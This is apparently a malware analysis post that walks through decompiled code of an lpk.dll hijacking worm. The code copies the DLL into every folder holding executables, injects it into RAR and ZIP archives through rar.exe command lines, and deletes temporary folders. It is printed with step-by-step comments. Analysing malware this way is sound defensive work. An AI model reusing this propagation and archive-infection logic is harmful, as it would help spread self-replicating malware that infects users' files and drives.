The previous analysis is the main program, the following analysis of the load, lpk.dll will be propagated to each folder containing exe
BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { BOOL result; // eax@9 if ( fdwReason == 1 ) { hModule = hinstDLL; GetModuleFileNameW(hinstDLL, (LPWSTR)&Filename, 0x104u); DisableThreadLibraryCalls(hinstDLL); if ( sub_10001134() == 1 ) // Get the resource Ghijkl Nopqrstu Wxy, this string { if ( !sub_10001338() && !sub_100012BD() ) // Make sure that the executable does not start with hrl and that there is only one mutex sub_10001193(); if ( sub_100012F6() == 1 ) { hEvent = CreateEventW(0, 1, 0, 0); if ( hEvent ) sub_100019E6(); //A key } } result = sub_100010CE(); // result indicates whether the lpk under the system directory is loaded successfully } else { if ( !fdwReason ) { if ( hEvent ) { SetEvent(hEvent); WaitForSingleObject(hObject, 0xFFFFFFFF); CloseHandle(hObject); CloseHandle(hEvent); } sub_10001123(); //release } result = 1; } return result; }
Function 0x10001123
DWORD sub_100019E6() { DWORD result; // eax@2 hObject = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_100018D3, 0, 4u, 0); //Create a new thread if ( !SetThreadPriority(hObject, 0xFFFFFFF1) || (result = ResumeThread(hObject), result == 0xFFFFFFFF) ) { result = TerminateThread(hObject, 0); hObject = 0; } return result; } int __stdcall sub_100018D3() { DWORD v0; // edi@1 int v1; // ebx@2 char *v2; // ebp@2 HANDLE v3; // eax@5 HANDLE *v4; // esi@5 DWORD v5; // esi@11 int result; // eax@16 DWORD v7; // esi@18 signed int v8; // [sp+10h] [bp-C4h]@2 HANDLE Handles; // [sp+14h] [bp-C0h]@5 char v10; // [sp+74h] [bp-60h]@1 v0 = 0; RtlZeroMemory(&v10, 0x60); do { v1 = 2; v2 = &v10; v8 = 24; do { // DriveType get drive type, U disk, RAM, hard disk if ( *(_DWORD *)v2 != 1 && (unsigned int)(DriveType(v1) - 2) <= 2 ) { v3 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartAddress, (LPVOID)v1, 4u, 0); v4 = &Handles + v0; *v4 = v3; if ( v3 ) { if ( SetThreadPriority(v3, 0xFFFFFFF1) != 1 || ResumeThread(*v4) == 0xFFFFFFFF ) { TerminateThread(*v4, 0); } else { ++v0; *(_DWORD *)v2 = 1; } } } ++v1; v2 += 4; --v8; } while ( v8 ); v5 = 0; if ( v0 && WaitForMultipleObjects(v0, &Handles, 1, 0) != 0x102 ) { RtlZeroMemory(&v10, 0x60); if ( v0 ) { do CloseHandle(*(&Handles + v5++)); while ( v5 < v0 ); } v0 = 0; } result = sub_10001606(); } while ( result == 1 ); if ( v0 ) { result = WaitForMultipleObjects(v0, &Handles, 1, 0xFFFFFFFF); v7 = 0; if ( v0 ) { do result = CloseHandle(*(&Handles + v7++)); while ( v7 < v0 ); } } return result; }
Function StartAddress
Function function: search all the folders in the drive letter of the computer, find. Exe,. Rar,. Zip and other files, and search recursively
if ( (unsigned int)lpThreadParameter >= 0x100 ) { lstrcpyW(&String1, (LPCWSTR)lpThreadParameter); // } else { lstrcpyW(&String1, L"A:\\"); String1 += (unsigned __int16)lpThreadParameter; } lstrcpyW(&String2, &String1); // Starting from the root of Disk C PathAppendW(&String1, &word_10002374); hFindFile = FindFirstFileW(&String1, &FindFileData); //Find the first file .... while ( 1 ) { if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..") )// Ignore the results of. And goto LABEL_27; if ( FindFileData.dwFileAttributes & 0x10 ) // Is it a directory break; v2 = PathFindExtensionW(FindFileData.cFileName); lpString2 = v2; if ( v2 ) { if ( !lstrcmpiW(v2, L".EXE") ) // Find exe file { lstrcpyW(&String2, &String1); PathAppendW(&String2, L"lpk.dll"); if ( GetFileAttributesW(&String2) != 0xFFFFFFFF ) goto LABEL_27; CopyFileW(&Filename, &String2, 1); //Copy to folder SetFileAttributesW(&String2, 7u); } if ( (!lstrcmpiW(lpString2, L".RAR") || !lstrcmpiW(lpString2, L".ZIP")) // Find compressed file && !FindFileData.nFileSizeHigh && FindFileData.nFileSizeLow < 0x3200000 ) { lstrcpyW(&String2, &String1); PathAppendW(&String2, FindFileData.cFileName);// File full path sub_1000142B((int)&String2); } } if ( WaitForSingleObject(hEvent, 0x14u) != 258 ) goto LABEL_14; LABEL_27: if ( FindNextFileW(hFindFile, &FindFileData) != 1 ) goto LABEL_15; }
Function 0x1000142B
Function function: decompress the compressed file, and
v8 = 0x208; result = (_WORD *)SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0, &String1, &v8); if ( !result ) { if ( String1 == '"' ) { lstrcpyW(&String1, &String2); v2 = L"\""; } else { v2 = L" "; } result = (_WORD *)StrStrIW(&String1, v2); if ( result ) { *result = 0; PathRemoveFileSpecW(&String1); PathAppendW(&String1, L"rar.exe"); result = (_WORD *)GetFileAttributesW(&String1); if ( result != (_WORD *)0xFFFFFFFF ) { PathGetShortPath(&String1); GetTempPathW(0x104u, &Buffer); v3 = GetCurrentThreadId(); GetTempFileNameW(&Buffer, L"IRAR", v3, &Buffer); wsprintfW(&CommandLine, L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"", &String1, a1, &Buffer); result = (_WORD *)sub_10001398(&CommandLine, 0xEA60u);// See if the lpk.dll file exists if ( result ) // Non-existent { wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &String1, a1, &Buffer);// String1 = rar.exe sub_10001398(&CommandLine, 0x1D4C0u); // decompression StartAddress(&Buffer); wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &String1, &Buffer, a1, &Buffer); sub_10001398(&CommandLine, 0x3A980u); // compress wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &Buffer);// Recursively delete files result = (_WORD *)sub_10001398(&CommandLine, 0xEA60u); } } } }
Generally speaking, this is not too difficult. I have the chance to write this program myself